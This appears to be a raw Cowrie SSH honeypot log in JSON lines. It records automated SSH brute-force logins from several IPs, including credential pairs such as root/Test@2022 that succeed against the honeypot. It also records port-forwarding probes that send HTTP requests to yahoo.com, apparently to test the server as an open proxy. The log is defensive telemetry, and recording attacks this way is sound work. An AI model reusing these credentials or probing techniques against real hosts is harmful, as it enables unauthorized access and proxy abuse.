{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:36.220347Z","src_ip":"27.112.78.170","session":"7956d706bd5e"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":33618,"dst_ip":"1.2.3.4","dst_port":22,"session":"2425a8afb26e","protocol":"ssh","message":"New connection: 36.89.28.139:33618 (1.2.3.4:22) [session: 2425a8afb26e]","sensor":"my-vps","timestamp":"2025-08-26T00:56:36.360974Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:36.361930Z","src_ip":"36.89.28.139","session":"2425a8afb26e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:36.456310Z","src_ip":"213.209.150.239","session":"e467fc61ff15"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.170","src_port":55676,"dst_ip":"1.2.3.4","dst_port":22,"session":"4564a9084b05","protocol":"ssh","message":"New connection: 27.112.78.170:55676 (1.2.3.4:22) [session: 4564a9084b05]","sensor":"my-vps","timestamp":"2025-08-26T00:56:36.476633Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:36.477445Z","src_ip":"27.112.78.170","session":"4564a9084b05"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":25740,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:25740","sensor":"my-vps","timestamp":"2025-08-26T00:56:36.513723Z","session":"e467fc61ff15"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:56:36.565904Z","src_ip":"36.89.28.139","session":"2425a8afb26e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:36.570166Z","src_ip":"213.209.150.239","session":"e467fc61ff15"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":28231,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:28231","sensor":"my-vps","timestamp":"2025-08-26T00:56:36.727051Z","session":"e467fc61ff15"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:56:36.735924Z","src_ip":"27.112.78.170","session":"4564a9084b05"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:36.784171Z","src_ip":"213.209.150.239","session":"e467fc61ff15"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:36.841474Z","src_ip":"213.209.150.239","session":"e467fc61ff15"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":56806,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f45a6df45a9","protocol":"ssh","message":"New connection: 213.209.150.239:56806 (1.2.3.4:22) [session: 6f45a6df45a9]","sensor":"my-vps","timestamp":"2025-08-26T00:56:36.897366Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:36.898216Z","src_ip":"213.209.150.239","session":"6f45a6df45a9"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:36.954845Z","src_ip":"213.209.150.239","session":"6f45a6df45a9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:37.237405Z","src_ip":"213.209.150.239","session":"6f45a6df45a9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":11124,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:11124","sensor":"my-vps","timestamp":"2025-08-26T00:56:37.295853Z","session":"6f45a6df45a9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:37.352830Z","src_ip":"213.209.150.239","session":"6f45a6df45a9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":2292,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:2292","sensor":"my-vps","timestamp":"2025-08-26T00:56:37.506995Z","session":"6f45a6df45a9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:37.563514Z","src_ip":"213.209.150.239","session":"6f45a6df45a9"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:37.620871Z","src_ip":"213.209.150.239","session":"6f45a6df45a9"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":56867,"dst_ip":"1.2.3.4","dst_port":22,"session":"9060ad0e1a14","protocol":"ssh","message":"New connection: 213.209.150.239:56867 (1.2.3.4:22) [session: 9060ad0e1a14]","sensor":"my-vps","timestamp":"2025-08-26T00:56:37.676628Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:37.677485Z","src_ip":"213.209.150.239","session":"9060ad0e1a14"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:37.733956Z","src_ip":"213.209.150.239","session":"9060ad0e1a14"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:56:37.814039Z","src_ip":"27.112.78.170","session":"4564a9084b05"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:38.016134Z","src_ip":"213.209.150.239","session":"9060ad0e1a14"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":2416,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:2416","sensor":"my-vps","timestamp":"2025-08-26T00:56:38.073411Z","session":"9060ad0e1a14"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:38.130040Z","src_ip":"213.209.150.239","session":"9060ad0e1a14"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":2349,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:2349","sensor":"my-vps","timestamp":"2025-08-26T00:56:38.287014Z","session":"9060ad0e1a14"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:38.343605Z","src_ip":"213.209.150.239","session":"9060ad0e1a14"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:38.401545Z","src_ip":"213.209.150.239","session":"9060ad0e1a14"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":56925,"dst_ip":"1.2.3.4","dst_port":22,"session":"4da8a384b039","protocol":"ssh","message":"New connection: 213.209.150.239:56925 (1.2.3.4:22) [session: 4da8a384b039]","sensor":"my-vps","timestamp":"2025-08-26T00:56:38.447766Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:38.448739Z","src_ip":"213.209.150.239","session":"4da8a384b039"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:38.495647Z","src_ip":"213.209.150.239","session":"4da8a384b039"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:38.730908Z","src_ip":"213.209.150.239","session":"4da8a384b039"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":19837,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:19837","sensor":"my-vps","timestamp":"2025-08-26T00:56:38.778710Z","session":"4da8a384b039"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:38.825869Z","src_ip":"213.209.150.239","session":"4da8a384b039"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":9442,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:9442","sensor":"my-vps","timestamp":"2025-08-26T00:56:38.961513Z","session":"4da8a384b039"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:39.008653Z","src_ip":"213.209.150.239","session":"4da8a384b039"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:39.044250Z","src_ip":"36.89.28.139","session":"2425a8afb26e"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:39.056236Z","src_ip":"213.209.150.239","session":"4da8a384b039"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:39.080194Z","src_ip":"27.112.78.170","session":"4564a9084b05"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":56975,"dst_ip":"1.2.3.4","dst_port":22,"session":"facad029947a","protocol":"ssh","message":"New connection: 213.209.150.239:56975 (1.2.3.4:22) [session: facad029947a]","sensor":"my-vps","timestamp":"2025-08-26T00:56:39.102328Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:39.103103Z","src_ip":"213.209.150.239","session":"facad029947a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:39.150029Z","src_ip":"213.209.150.239","session":"facad029947a"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:39.250239Z","src_ip":"36.89.28.139","session":"2425a8afb26e"}
{"eventid":"cowrie.session.closed","duration":"9.4","message":"Connection lost after 9.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:39.268723Z","src_ip":"36.89.28.139","session":"9f4b19ea12d5"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.170","src_port":52814,"dst_ip":"1.2.3.4","dst_port":22,"session":"e333a354da6e","protocol":"ssh","message":"New connection: 27.112.78.170:52814 (1.2.3.4:22) [session: e333a354da6e]","sensor":"my-vps","timestamp":"2025-08-26T00:56:39.361134Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:39.361746Z","src_ip":"27.112.78.170","session":"e333a354da6e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:39.383598Z","src_ip":"213.209.150.239","session":"facad029947a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":17689,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:17689","sensor":"my-vps","timestamp":"2025-08-26T00:56:39.431341Z","session":"facad029947a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:39.480187Z","src_ip":"213.209.150.239","session":"facad029947a"}
